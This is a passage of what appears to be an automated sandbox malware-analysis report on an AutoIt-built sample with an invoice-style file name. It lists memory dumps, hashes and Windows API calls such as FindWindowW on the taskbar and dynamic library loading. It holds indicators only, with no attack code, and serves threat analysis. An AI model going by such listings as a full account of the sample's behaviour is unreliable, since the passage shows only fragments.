• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: dcae7cedb43d202504caca785b907179b55a4e853567f95ac284d47b74dbef84
• Instruction ID: 629d55f1038fccaf6ed8525e0201a6fd08bdbe8350d3356f57d2ebd442581610
• Opcode Fuzzy Hash: dcae7cedb43d202504caca785b907179b55a4e853567f95ac284d47b74dbef84
• Instruction Fuzzy Hash: 4DE06D706007048BD7609F28E8043467AE4AF40714F10CD6EE44AC7781E7B4D448EBA2
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F27C82
  • Part of subcall function 00EF3358: _doexit.LIBCMT ref: 00EF3362
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: cb7a4cdc829b2bb0ea4babf59ebdcac32df0acf13865192985b203759afcfec9
• Instruction ID: de27c516da0fb7eaa099025254d6b6cd8a8028453bcfaf61f332e07c4645c4b9
• Opcode Fuzzy Hash: cb7a4cdc829b2bb0ea4babf59ebdcac32df0acf13865192985b203759afcfec9
• Instruction Fuzzy Hash: 5BD012327C931C36D21532B56C07BDA76888B15B52F141456BB08A95D349D18581A2E6
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00F11775
  • Part of subcall function 00F4BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F1195E,?), ref: 00F4BFFE
  • Part of subcall function 00F4BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F4C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F1196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 1fb9ba841b2ca204468c80559e01ac25a813c67c2ad029786d3bf0e566e4e44c
• Instruction ID: 42c0f24193d7f8a6573c3d9bf37e7c7d424e1a23c7f4b7b5716694c1d1cf34a1
• Opcode Fuzzy Hash: 1fb9ba841b2ca204468c80559e01ac25a813c67c2ad029786d3bf0e566e4e44c
• Instruction Fuzzy Hash: 55F0C97180010DDFDB15DBA5C988BECBBF8BB08315F640096E712A2291D7758F89EF61
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F559AE
• PostMessageW.USER32(00000000), ref: 00F559B5
  • Part of subcall function 00F35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 8f0a663236dd4d69b4c3df3349b794208aa39b0e91c9133a996aeeab891d5e87
• Instruction ID: 06a4a3f1d1d6e8f141419657847f70352e8029c61e7f5c17619490a06e4c3332
• Opcode Fuzzy Hash: 8f0a663236dd4d69b4c3df3349b794208aa39b0e91c9133a996aeeab891d5e87
• Instruction Fuzzy Hash: DAD0C9313C0315BBE664BB709D0BFD77A14AB45B61F040865B346AB1D0D9E4A804D654
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F55981
  • Part of subcall function 00F35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: c1880f236413c5978f2115d890c138ae0d4ee5483fa10e78a5f0cf85f0cdc58a
• Instruction ID: 5a5844555c67bbe26375142638e127494e12f72819497333d2fd873832d9a00a
• Opcode Fuzzy Hash: c1880f236413c5978f2115d890c138ae0d4ee5483fa10e78a5f0cf85f0cdc58a
• Instruction Fuzzy Hash: D4D0C935384315B7E664BB709D0BFD77A14AB40B61F040865B34AAB1D0D9E49804D654